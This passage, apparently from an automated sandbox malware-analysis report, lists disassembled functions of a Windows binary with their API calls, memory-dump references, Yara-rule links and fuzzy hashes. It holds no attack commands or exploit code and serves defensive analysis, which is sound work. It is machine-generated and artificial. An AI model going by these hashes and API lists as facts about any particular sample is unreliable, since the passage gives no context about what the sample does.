                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00167E8A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 357397906-0
                                                                                                                                                                                                                                          • Opcode ID: 389bd468efe8f95b6614df86c319685e704ba81a86e44d5dea60a3dbdf4d621e
                                                                                                                                                                                                                                          • Instruction ID: 7b89720dbddd61c6ae17cef2d5e5b9a7a4cbe4935ee5db997d159da8d4012d07
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 389bd468efe8f95b6614df86c319685e704ba81a86e44d5dea60a3dbdf4d621e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 901186B9D0024AAFDB41CF98C8849EEBBF5FF08310F504056E951E3610D775AA94CF90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00132DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00132DC5
                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00132DD6
                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00132DDD
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00132DE4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2710830443-0
                                                                                                                                                                                                                                          • Opcode ID: 671e351a1a0496bdd39d5e632621772705e52af35992073338899cb34ee9ab23
                                                                                                                                                                                                                                          • Instruction ID: 9aea3dbcac6f8e2bdab60844ff22cf468225a9eafbcda262083e8f8eb8baf70d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 671e351a1a0496bdd39d5e632621772705e52af35992073338899cb34ee9ab23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73E0ED71501224BADB202BA2DC0DEFB7E6CEF56BA1F410115F506D15909AE58981C6F1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00168863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E9693
                                                                                                                                                                                                                                            • Part of subcall function 000E9639: SelectObject.GDI32(?,00000000), ref: 000E96A2
                                                                                                                                                                                                                                            • Part of subcall function 000E9639: BeginPath.GDI32(?), ref: 000E96B9
                                                                                                                                                                                                                                            • Part of subcall function 000E9639: SelectObject.GDI32(?,00000000), ref: 000E96E2
                                                                                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00168887
                                                                                                                                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00168894
                                                                                                                                                                                                                                          • EndPath.GDI32(?), ref: 001688A4
                                                                                                                                                                                                                                          • StrokePath.GDI32(?), ref: 001688B2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                                                                                                          • Opcode ID: bfd306f736eb4e402a1c2d42a681992628ac4b6f161d4f9fd8a2fc9281d6621e
                                                                                                                                                                                                                                          • Instruction ID: a4b6d6b688ed17a65166b05cfbd3beecc466b38661b749bd8b183f52feeed1a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfd306f736eb4e402a1c2d42a681992628ac4b6f161d4f9fd8a2fc9281d6621e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BF0823A041258FBDB126F94AC0DFDE3F59AF0A310F048100FA51654E2C7B555A1CFE5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSysColor.USER32(00000008), ref: 000E98CC
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 000E98D6
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 000E98E9
                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 000E98F1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4037423528-0
                                                                                                                                                                                                                                          • Opcode ID: b544866ad57fbf7c05ec8d50f062c6fac8425dfed7cbbe61c2407945bbaaf855
                                                                                                                                                                                                                                          • Instruction ID: a70b0b4d559bc0f56510dfe78b0188b55906ca58a5b2423569e8b70a613b2a9c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b544866ad57fbf7c05ec8d50f062c6fac8425dfed7cbbe61c2407945bbaaf855
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47E06D31244280EFDB216B78BC09BF93F61AB52336F04821AF6FA984E1C3B146909B51
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00131634
                                                                                                                                                                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,001311D9), ref: 0013163B
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001311D9), ref: 00131648
                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,001311D9), ref: 0013164F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3974789173-0
                                                                                                                                                                                                                                          • Opcode ID: e916262e6d8e76b0b425e267ff5cc087e992bf92a8a80bc832d4894349675dc8
                                                                                                                                                                                                                                          • Instruction ID: 7ef10b06a7f907513a29e344653c8118dbe9f64597ab333f3b562a0eb6b73694
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e916262e6d8e76b0b425e267ff5cc087e992bf92a8a80bc832d4894349675dc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E08675601211EBD7201FE19D0DB673B7CAF54791F14480CF685C9080D7B44480C790
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0012D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0012D858
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0012D862
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0012D882
                                                                                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0012D8A3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                                                                                          • Opcode ID: 611712b47ed9964a863c42a9af8db61d4ea92abc8edccf1fcf16fd0236f3b016
                                                                                                                                                                                                                                          • Instruction ID: 8cf181105aba8ca0b2e7af4db4ad01466a0166e64a84612eff644ac8e8871d7f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 611712b47ed9964a863c42a9af8db61d4ea92abc8edccf1fcf16fd0236f3b016
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0E01AB5800205DFDB419FA0DC08A7DBBB1FB08310F14901AF88AE7750C7B85991AF94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0012D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0012D86C
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0012D876
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0012D882
                                                                                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0012D8A3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                                                                                          • Opcode ID: 8b30e5f8afcc23abd2d6ce31e1862ffaaf3a388585a03ff4c41b6d266dfb7e6d
                                                                                                                                                                                                                                          • Instruction ID: 2f575f2ccb39b2f2ddca8b016e5c84cc4c31512c12e5d9c40b2bd6e56131797b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b30e5f8afcc23abd2d6ce31e1862ffaaf3a388585a03ff4c41b6d266dfb7e6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BE01A75800200DFCB509FA0DC0866DBBB1FB08310B149009F88AE7750C7B859419F94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00144D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
                                                                                                                                                                                                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00144ED4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Connection_wcslen
                                                                                                                                                                                                                                          • String ID: *$LPT
                                                                                                                                                                                                                                          • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                          • Opcode ID: 6a02cd377a5c31e79f3cf0b0e3ae97ad3391d877225255c39fa378aa77eff607
                                                                                                                                                                                                                                          • Instruction ID: 10a44b4321e00debdec43519c7d6f390f97d304b1f318c6fd7fc1bb1e8590106
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a02cd377a5c31e79f3cf0b0e3ae97ad3391d877225255c39fa378aa77eff607
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE917075A002049FDB14DF58C484FAABBF1BF44304F598099E84A9F3A2D775EE85CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000FE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 000FE30D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                                                                                          • String ID: pow
                                                                                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                          • Opcode ID: 0fc5941588bd606aaba36cf410f1890597cbd24ab425372bde7cec60b3cf987a
                                                                                                                                                                                                                                          • Instruction ID: 5b609fe590585cca6819f07b42cb0cdb0a28dff2c18e3d201fd9c7a252882c7b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fc5941588bd606aaba36cf410f1890597cbd24ab425372bde7cec60b3cf987a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E51AD71E0D24696CB157B14CD0937D3BE4EB50740F308D98E1DA82AF9EB749CD1AB42
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000EE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: #
                                                                                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                                                                                          • Opcode ID: 2864b51020c77db7ad43cc36f3745548a52d659718e1148c812f0a3334f7f12b
                                                                                                                                                                                                                                          • Instruction ID: 79c541e2c42557fd69641621c7c6d7a8ff86bcd1f0b7306d26009db20621dbf2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2864b51020c77db7ad43cc36f3745548a52d659718e1148c812f0a3334f7f12b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B51433560039ADFDB28DF68D4816FA7BE8EF55310F248059E891AB2D1D7309D52CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000EF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 000EF2A2
                                                                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 000EF2BB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 47fdccdc5a1ec0fce32fab9571873186ec5ed986ef7a241d88f5a23226be4d9c
                                                                                                                                                                                                                                          • Instruction ID: b8859770fbdef10827779f27766a4899e4c1693d2371726c6708cd187d925c7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47fdccdc5a1ec0fce32fab9571873186ec5ed986ef7a241d88f5a23226be4d9c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D55128724187459BE320AF10DC86BABBBF8FB84300F81885DF1D981196EB719569CB67
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00155745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001557E0
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001557EC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                          • String ID: CALLARGARRAY
                                                                                                                                                                                                                                          • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                          • Opcode ID: e42e231a597b343154be5b91e5c16c75436db604c180a11a0e00afa184efd810
                                                                                                                                                                                                                                          • Instruction ID: d9a02b11d90ec4eb3d1e802c6dd61745f149e411203ad82d26d15702cac28e2a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e42e231a597b343154be5b91e5c16c75436db604c180a11a0e00afa184efd810
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF41B371E00209DFCB04DFA9C8919FEBBB6EF59311F104029E815AB252D7719D85CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014D130
                                                                                                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0014D13A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
